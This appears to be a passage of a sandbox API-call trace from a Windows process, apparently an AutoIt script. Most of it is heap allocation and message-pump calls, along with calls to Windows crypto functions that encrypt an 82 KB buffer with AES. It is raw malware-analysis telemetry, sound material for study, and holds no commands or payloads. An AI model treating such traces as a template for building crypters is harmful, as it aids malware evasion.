(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.101] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.102] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0042.103] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.103] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.105] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.105] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.105] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.106] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.106] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.106] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.106] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.106] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.107] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0042.107] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.108] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1435f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14360) returned 1 [0042.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.108] CharLowerBuffW (in: lpsz="byte[82785]", cchLength=0xb | out: lpsz="byte[82785]") returned 0xb [0042.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.110] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.112] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95d6d8*, pdwDataLen=0x6ae220*=0x1435f, dwBufLen=0x14360 | out: pbData=0x95d6d8*, pdwDataLen=0x6ae220*=0x14360) returned 1 [0042.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.116] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 